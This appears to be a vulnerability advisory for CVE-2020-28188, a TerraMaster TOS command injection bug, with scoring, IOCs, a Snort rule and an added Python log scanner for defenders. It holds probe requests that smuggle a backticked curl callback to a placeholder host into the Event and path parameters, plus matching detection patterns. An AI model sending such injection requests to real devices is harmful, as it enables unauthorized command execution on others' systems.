CVE-2020-28188
published 2020-12-24

CVE-2020-28188: Remote Command Execution (RCE) vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to inject OS commands via /include/makecvs.php…

Priority: P1 (95)
Severity: critical, 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: ITW, EXPLOIT, VulnCheck KEV, Ransomware
Exploited in the wild
EPSS: 96.60% (99.9th percentile)
Remote Command Execution (RCE) vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to inject OS commands via /include/makecvs.php in the Event parameter.

Affected

1 range

Vendor: terra-master
Product: tos
Version range: <= 4.2.06
Fixed in: (not listed)

Detection & IOCs (extracted from sources)

path: /include/makecvs.php
command: GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1
command: GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1
path: /tos/index.php?explorer/pathList
snort:
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible TerraMaster TOS RCE Inbound (CVE-2020-28188 CVE-2020-35665)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/makecvs.php?Event="; fast_pattern; pcre:"/(?:[\x60\x3b\x7c]|%60|%3b|%7c|%26|(?:[\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))/R"; http.uri.raw; content:"%20"; reference:url,research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/; reference:cve,2020-28188; reference:cve,2020-35665; classtype:attempted-admin; sid:2031535; rev:3; metadata:attack_target Server, created_at 2021_01_21, cve CVE_2020_28188, deployment Perimeter, deployment Internal, performance_impact Low, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_11_18;)
  • The malware achieves persistence by adding itself to rc.local — monitor writes to /etc/rc.local or rc.local for unexpected entries.
  • The Nuclei template uses OAST/interactsh callback detection: a successful HTTP interaction with the User-Agent header matching the random base string confirms exploitation.
  • C2 traffic to gxbrowser[.]net on IRC — the botnet communicates via IRC with hardcoded, obfuscated credentials; all C2 addresses are hardcoded in the script.
  • The malware (out.py) is polymorphic and re-obfuscated on every download — function names and variable names change each time, making static hash-based detection unreliable.
  • The Snort/ET rule (sid:2031535) also covers CVE-2020-35665 (a related TerraMaster endpoint) — detections firing on this rule may relate to either CVE, requiring URI inspection to distinguish.
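To make the URI inspection the last note calls for concrete, here is an added example (my own code, not from the page, the ET ruleset or the Nuclei project) that replays the URI clauses of ET rule sid:2031535 over constructed access-log lines and reports which endpoint each hit abuses and whether the rule's clauses would all be satisfied. It assumes combined-log-format input and uses oast.example as a stand-in for the {{interactsh-url}} placeholder; it runs on the raw URI string, whereas Suricata matches the normalized http.uri buffer first and the raw buffer second.

```python
import re
from urllib.parse import unquote

# Added example (not from the page or the ET ruleset): re-implements the URI checks of ET rule
# sid:2031535 for offline access-log review. EVENT_ANCHOR is the rule's fast_pattern content and
# META_RE its pcre (class bracket restored), applied to what follows the anchor. PATHLIST_ANCHOR
# is the second endpoint from the Nuclei probe above; the ET rule does not key on it.
EVENT_ANCHOR = "/makecvs.php?Event="
PATHLIST_ANCHOR = "/tos/index.php?explorer/pathList&path="
META_RE = re.compile(
    r"(?:[\x60\x3b\x7c]|%60|%3b|%7c|%26|(?:[\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))")
# Combined log format request line (constructed for this example).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) \S+"')

def classify_uri(method, uri):
    """Return (endpoint label, would every ET clause fire) or None if not suspicious."""
    if method != "GET":
        return None
    for anchor, label in ((EVENT_ANCHOR, "makecvs.php Event"), (PATHLIST_ANCHOR, "pathList path")):
        idx = uri.find(anchor)
        if idx == -1:
            continue
        if not META_RE.search(uri[idx + len(anchor):]):
            return None  # parameter present but no shell metacharacter after it
        # The ET rule keys only on makecvs.php and also requires a literal "%20" in the
        # raw URI; a '+'-encoded space, as in the Nuclei probe above, does not satisfy it.
        et_fires = anchor == EVENT_ANCHOR and "%20" in uri
        return label, et_fires
    return None

def scan_log(lines):
    """Return (ip, decoded URI, verdict) for every request line that classifies as suspicious."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        verdict = classify_uri(m["method"], m["uri"])
        if verdict is not None:
            hits.append((m["ip"], unquote(m["uri"]), verdict))
    return hits

# Constructed sample lines; oast.example stands in for the {{interactsh-url}} placeholder.
SAMPLE_LOG = [
    '203.0.113.10 - - [24/Dec/2020:10:00:02 +0000] "GET /include/makecvs.php?Event=2020-12-24 HTTP/1.1" 200 40',
    '198.51.100.7 - - [24/Dec/2020:10:00:03 +0000] "GET /include/makecvs.php?Event=%60curl%20http%3a//oast.example%60 HTTP/1.1" 200 40',
    '198.51.100.7 - - [24/Dec/2020:10:00:04 +0000] "GET /include/makecvs.php?Event=%60curl+http%3a//oast.example%60 HTTP/1.1" 200 40',
    '198.51.100.7 - - [24/Dec/2020:10:00:05 +0000] "GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//oast.example%60 HTTP/1.1" 200 40',
]
```

scan_log(SAMPLE_LOG) returns the three injection hits; only the %20-encoded makecvs.php request satisfies every clause of the ET rule, which is why the pathList endpoint and '+'-encoded probes need a separate rule or log review.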

CVSS provenance

NVD, CVSS v3.1: 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD, CVSS v2.0: 10.0 CRITICAL, AV:N/AC:L/Au:N/C:C/I:C/A:C
VulnCheck: 9.8 CRITICAL